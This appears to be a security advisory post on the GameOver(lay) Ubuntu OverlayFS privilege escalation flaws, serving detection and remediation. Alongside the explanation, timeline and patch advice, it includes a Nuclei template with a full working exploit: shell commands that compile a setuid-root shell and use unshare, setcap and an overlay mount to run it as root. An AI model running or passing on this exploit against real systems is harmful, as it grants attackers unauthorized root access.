GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel

GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel

GameOver(lay) encompasses two significant vulnerabilities within the Ubuntu kernel, CVE-2023-2640, and CVE-2023-32629, each carrying a high-severity rating with CVSS scores of 7.8. These vulnerabilities pose a critical threat, potentially affecting around 40% of Ubuntu users. The vulnerability lies within the OverlayFS module of the Ubuntu kernel, enabling a local attacker to execute a privilege escalation attack, granting unauthorized elevated access to the system.

Technical Details

CVE-2023-2640: This vulnerability emerges from specific configurations within Ubuntu kernels. It occurs when an Ubuntu kernel includes both c914c0e27eb0 and the UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs modifications. An unprivileged user gains the ability to set privileged extended attributes on files mounted via OverlayFS. These attributes are then improperly applied to the upper files, bypassing the necessary security checks. This creates a loophole where unprivileged users can perform actions they typically wouldn't have permission to perform.

CVE-2023-32629: This is a local privilege escalation vulnerability present in Ubuntu's OverlayFS. The flaw resides in the ovl_copy_up_meta_inode_data function of OverlayFS, which incorrectly skips permission checks when executing ovl_do_setxattr. The crux of this vulnerability is the potential for an attacker to craft a special executable file endowed with scoped file capabilities. When the Ubuntu Kernel is tricked into copying this file to a location with un-scoped capabilities, it inadvertently grants root-like privileges to any user who executes the file. This vulnerability allows a local attacker to escalate their privileges to the highest level, gaining unfettered access to the system.

Nuclei Template

ProjectDiscovery Cloud Platform
Create, edit, generate, and scan templates using AI in one seamless experience with Nuclei.
id: CVE-2023-2640

info:
  name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
  author: princechaddha
  severity: high
  description: |
    A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
  tags: packetstorm,cve,cve2023,kernel,ubuntu,linux,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      id

  - engine:
      - sh
      - bash
    source: |
      cd /tmp
      echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
      gcc test.c -o test
      unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"

    matchers:
      - type: dsl
        dsl:
          - '!contains(code_1_response, "(root)")'
          - 'contains(code_2_response, "(root)")'
        condition: and

Timeline

The vulnerabilities were fixed by Ubuntu as of July 24, 2023, following responsible disclosure​​.

Remediation

Users are recommended to apply updates provided by Ubuntu to mitigate these vulnerabilities. Taking advantage of these vulnerabilities requires establishing a user namespace and an OverlayFS mount, hinting that attackers need local code execution capabilities on the targeted system, making remote exploitation unlikely​​.

References

GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
Wiz Research discovers CVE-2023-2640 & CVE-2023-32629, 2 privilege escalation vulnerabilities in Ubuntu’s OverlayFS module impacting 40% of cloud workloads.
GameOver(lay): Two Severe Linux Vulnerabilities Impact 40% of Ubuntu Users
Cybersecurity researchers have uncovered high-severity flaws in the Ubuntu kernel, impacting 40% of users!

Subscribe to our newsletter and stay updated.

Don't miss anything. Get all the latest posts delivered straight to your inbox. It's free!
Great! Check your inbox and click the link to confirm your subscription.
Error! Please enter a valid email address!
--